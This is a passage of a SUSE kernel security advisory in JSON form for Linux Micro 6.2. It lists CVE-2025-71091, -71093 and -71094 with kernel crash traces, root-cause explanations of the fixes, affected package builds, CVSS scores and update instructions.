"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-71089"
},
{
"cve": "CVE-2025-71091",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71091"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nteam: fix check for port enabled in team_queue_override_port_prio_changed()\n\nThere has been a syzkaller bug reported recently with the following\ntrace:\n\nlist_del corruption, ffff888058bea080-\u003eprev is LIST_POISON2 (dead000000000122)\n------------[ cut here ]------------\nkernel BUG at lib/list_debug.c:59!\nOops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\nCPU: 3 UID: 0 PID: 21246 Comm: syz.0.2928 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:__list_del_entry_valid_or_report+0x13e/0x200 lib/list_debug.c:59\nCode: 48 c7 c7 e0 71 f0 8b e8 30 08 ef fc 90 0f 0b 48 89 ef e8 a5 02 55 fd 48 89 ea 48 89 de 48 c7 c7 40 72 f0 8b e8 13 08 ef fc 90 \u003c0f\u003e 0b 48 89 ef e8 88 02 55 fd 48 89 ea 48 b8 00 00 00 00 00 fc ff\nRSP: 0018:ffffc9000d49f370 EFLAGS: 00010286\nRAX: 000000000000004e RBX: ffff888058bea080 RCX: ffffc9002817d000\nRDX: 0000000000000000 RSI: ffffffff819becc6 RDI: 0000000000000005\nRBP: dead000000000122 R08: 0000000000000005 R09: 0000000000000000\nR10: 0000000080000000 R11: 0000000000000001 R12: ffff888039e9c230\nR13: ffff888058bea088 R14: ffff888058bea080 R15: ffff888055461480\nFS: 00007fbbcfe6f6c0(0000) GS:ffff8880d6d0a000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000000110c3afcb0 CR3: 00000000382c7000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n __list_del_entry_valid include/linux/list.h:132 [inline]\n __list_del_entry include/linux/list.h:223 [inline]\n list_del_rcu include/linux/rculist.h:178 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:826 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:821 [inline]\n team_queue_override_port_prio_changed drivers/net/team/team_core.c:883 [inline]\n team_priority_option_set+0x171/0x2f0 drivers/net/team/team_core.c:1534\n team_option_set drivers/net/team/team_core.c:376 [inline]\n team_nl_options_set_doit+0x8ae/0xe60 drivers/net/team/team_core.c:2653\n genl_family_rcv_msg_doit+0x209/0x2f0 net/netlink/genetlink.c:1115\n genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]\n genl_rcv_msg+0x55c/0x800 net/netlink/genetlink.c:1210\n netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552\n genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg net/socket.c:742 [inline]\n ____sys_sendmsg+0xa98/0xc70 net/socket.c:2630\n ___sys_sendmsg+0x134/0x1d0 net/socket.c:2684\n __sys_sendmsg+0x16d/0x220 net/socket.c:2716\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nThe problem is in this flow:\n1) Port is enabled, queue_id != 0, in qom_list\n2) Port gets disabled\n -\u003e team_port_disable()\n -\u003e team_queue_override_port_del()\n -\u003e del (removed from list)\n3) Port is disabled, queue_id != 0, not in any list\n4) Priority changes\n -\u003e team_queue_override_port_prio_changed()\n -\u003e checks: port disabled \u0026\u0026 queue_id != 0\n -\u003e calls del - hits the BUG as it is removed already\n\nTo fix this, change the check in team_queue_override_port_prio_changed()\nso it returns early if port is not enabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71091",
"url": "https://www.suse.com/security/cve/CVE-2025-71091"
},
{
"category": "external",
"summary": "SUSE Bug 1256773 for CVE-2025-71091",
"url": "https://bugzilla.suse.com/1256773"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71091"
},
{
"cve": "CVE-2025-71093",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71093"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ne1000: fix OOB in e1000_tbi_should_accept()\n\nIn e1000_tbi_should_accept() we read the last byte of the frame via\n\u0027data[length - 1]\u0027 to evaluate the TBI workaround. If the descriptor-\nreported length is zero or larger than the actual RX buffer size, this\nread goes out of bounds and can hit unrelated slab objects. The issue\nis observed from the NAPI receive path (e1000_clean_rx_irq):\n\n==================================================================\nBUG: KASAN: slab-out-of-bounds in e1000_tbi_should_accept+0x610/0x790\nRead of size 1 at addr ffff888014114e54 by task sshd/363\n\nCPU: 0 PID: 363 Comm: sshd Not tainted 5.18.0-rc1 #1\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x5a/0x74\n print_address_description+0x7b/0x440\n print_report+0x101/0x200\n kasan_report+0xc1/0xf0\n e1000_tbi_should_accept+0x610/0x790\n e1000_clean_rx_irq+0xa8c/0x1110\n e1000_clean+0xde2/0x3c10\n __napi_poll+0x98/0x380\n net_rx_action+0x491/0xa20\n __do_softirq+0x2c9/0x61d\n do_softirq+0xd1/0x120\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n __local_bh_enable_ip+0xfe/0x130\n ip_finish_output2+0x7d5/0xb00\n __ip_queue_xmit+0xe24/0x1ab0\n __tcp_transmit_skb+0x1bcb/0x3340\n tcp_write_xmit+0x175d/0x6bd0\n __tcp_push_pending_frames+0x7b/0x280\n tcp_sendmsg_locked+0x2e4f/0x32d0\n tcp_sendmsg+0x24/0x40\n sock_write_iter+0x322/0x430\n vfs_write+0x56c/0xa60\n ksys_write+0xd1/0x190\n do_syscall_64+0x43/0x90\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7f511b476b10\nCode: 73 01 c3 48 8b 0d 88 d3 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d f9 2b 2c 00 00 75 10 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 8e 9b 01 00 48 89 04 24\nRSP: 002b:00007ffc9211d4e8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 0000000000004024 RCX: 00007f511b476b10\nRDX: 0000000000004024 RSI: 0000559a9385962c RDI: 0000000000000003\nRBP: 0000559a9383a400 R08: fffffffffffffff0 R09: 0000000000004f00\nR10: 0000000000000070 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007ffc9211d57f R14: 0000559a9347bde7 R15: 0000000000000003\n \u003c/TASK\u003e\nAllocated by task 1:\n __kasan_krealloc+0x131/0x1c0\n krealloc+0x90/0xc0\n add_sysfs_param+0xcb/0x8a0\n kernel_add_sysfs_param+0x81/0xd4\n param_sysfs_builtin+0x138/0x1a6\n param_sysfs_init+0x57/0x5b\n do_one_initcall+0x104/0x250\n do_initcall_level+0x102/0x132\n do_initcalls+0x46/0x74\n kernel_init_freeable+0x28f/0x393\n kernel_init+0x14/0x1a0\n ret_from_fork+0x22/0x30\nThe buggy address belongs to the object at ffff888014114000\n which belongs to the cache kmalloc-2k of size 2048\nThe buggy address is located 1620 bytes to the right of\n 2048-byte region [ffff888014114000, ffff888014114800]\nThe buggy address belongs to the physical page:\npage:ffffea0000504400 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14110\nhead:ffffea0000504400 order:3 compound_mapcount:0 compound_pincount:0\nflags: 0x100000000010200(slab|head|node=0|zone=1)\nraw: 0100000000010200 0000000000000000 dead000000000001 ffff888013442000\nraw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\n==================================================================\n\nThis happens because the TBI check unconditionally dereferences the last\nbyte without validating the reported length first:\n\n\tu8 last_byte = *(data + length - 1);\n\nFix by rejecting the frame early if the length is zero, or if it exceeds\nadapter-\u003erx_buffer_len. This preserves the TBI workaround semantics for\nvalid frames and prevents touching memory beyond the RX buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71093",
"url": "https://www.suse.com/security/cve/CVE-2025-71093"
},
{
"category": "external",
"summary": "SUSE Bug 1256777 for CVE-2025-71093",
"url": "https://bugzilla.suse.com/1256777"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71093"
},
{
"cve": "CVE-2025-71094",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71094"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: asix: validate PHY address before use\n\nThe ASIX driver reads the PHY address from the USB device via\nasix_read_phy_addr(). A malicious or faulty device can return an\ninvalid address (\u003e= PHY_MAX_ADDR), which causes a warning in\nmdiobus_get_phy():\n\n addr 207 out of range\n WARNING: drivers/net/phy/mdio_bus.c:76\n\nValidate the PHY address in asix_read_phy_addr() and remove the\nnow-redundant check in ax88172a.c.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71094",
"url": "https://www.suse.com/security/cve/CVE-2025-71094"
},
{
"category": "external",
"summary": "SUSE Bug 1256597 for CVE-2025-71094",
"url": "https://bugzilla.suse.com/1256597"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
